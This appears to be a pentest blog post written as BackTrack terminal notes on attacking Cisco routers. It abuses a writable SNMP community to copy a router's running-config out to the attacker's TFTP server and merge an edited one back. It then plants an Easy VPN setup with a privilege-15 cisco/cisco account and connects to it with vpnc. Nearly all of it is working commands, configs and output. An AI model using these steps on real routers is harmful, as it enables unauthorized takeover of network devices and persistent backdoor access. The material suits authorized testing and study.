backtrack 4 r 1
menu / services / TFTPD / Start TFTPD
1. root@bt:~#start-tftpd
2. root@bt:~#cd pentest/cisco/copy-router-config
3. root@bt:/pentest/cisco/copy-router-config#./copy-router-config.pl (rhost-ip) (your-ip) (snmp string name)
i.e ./copy-router-config.pl 192.168.1.1 192.168.0.200 public
4. Go to /tmp and look for the file named pwnd-router.config – open and read.
5. Change the config as required then press save.
6. root@bt:/pentest/cisco/copy-router-config#./merge-router-config.pl (rhost-ip) (your-ip) (snmp string name)
7. the config changes will take affect.
####################################################
to add cisco easy vpn config to a router (ras vpn)
!
aaa new-model
!
username cisco privilege 15 password cisco
!
aaa authentication login VPN_rights1 local
aaa authorization network network_rights1 local
!
crypto ipsec transform-set easy_vpn_transform_set1 esp-3des esp-sha-hmac
!
crypto dynamic-map VPN_DYMAP 1
set transform-set easy_vpn_transform_set1
reverse-route remote-peer
!
crypto map easy_vpn_crypto_map1 65535 ipsec-isakmp dynamic VPN_DYMAP
!
interface fastEthernet 0/0
crypto map easy_vpn_crypto_map1
!
crypto map easy_vpn_crypto_map1 client authentication list VPN_rights1
crypto map easy_vpn_crypto_map1 isakmp authorization list network_rights1
crypto map easy_vpn_crypto_map1 client configuration address respond
!
crypto isakmp client configuration group cisco
key hello
pool VPN_DHCP_POOL_1
max-users 2
netmask 255.255.255.0
!
ip local pool VPN_DHCP_POOL_1 192.168.78.78 192.168.78.80
!
crypto isakmp policy 1
encr 3des
authentication pre-share
group 2
!
crypto isakmp xauth timeout 15
!
###########################################################
cisco vpn client for linux
backtrack 4 r1
root@bt:~# apt-get install vpnc
root@bt:~# vpnc
Enter IPSec gateway address: 192.168.1.1
Enter IPSec ID for 192.168.1.1: cisco
Enter IPSec secret for cisco@ 192.168.1.1: hello
Enter username for 192.168.1.1: cisco
Enter password for cisco@ 192.168.1.1: cisco
VPNC started in background (pid: 17111)…
note bellow now you can also see tun0 interface. This is your connection back to the router.
root@bt:~# ifconfig
tun0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:192.168.78.78 P-t-P:192.168.78.78 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1412 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
—————————————-
Tested with Backtrack 5R3 now working!!
Install atftpd
root@bt:~# apt-get install atftpd
Run atftpd
root@bt:~# atftpd –daemon –port 69 /tmp
To see if running
root@bt:~# netstat -anup | grep atftp
—————————————-
Cisco Router Config
interface FastEthernet0/0
ip address 192.168.1.20 255.255.255.0
no shutdown
duplex auto
speed auto
!
snmp-server community public RO
snmp-server community private RW
—————————————-
root@bt:/pentest/cisco/copy-router-config# perl copy-router-config.pl 192.168.1.20 192.168.1.200 private
192.168.1.200:pwnd-router.config -> 192.168.1.20:running-config… Received badValue(3) error-status at error-index 1 at copy-router-config.pl line 34.
root@bt:/pentest/cisco/copy-router-config# perl copy-router-config.pl 192.168.1.20 192.168.1.200 private
192.168.1.200:pwnd-router.config -> 192.168.1.20:running-config… OK
—————————————-
Config is saved to you can add changes to this config then pass back.
/tmp/pwnd-router.config
—————————————-
Pass the changed config in /tmp/pwnd-router.config back
root@bt:/pentest/cisco/copy-router-config# perl merge-router-config.pl 192.168.1.20 192.168.1.200 private
192.168.1.200:pwnd-router.config -> 192.168.1.20:running-config… OK
—————————————-
You can see on the router it took the hostname change from R1 – Test
R1#
*Mar 1 00:05:32.379: %SYS-5-CONFIG_I: Configured from tftp://192.168.1.200/pwnd-router.config by console
R1#
Test#
myexploit 
One thought on “network – copy-router-config.pl / merge-router-config.pl”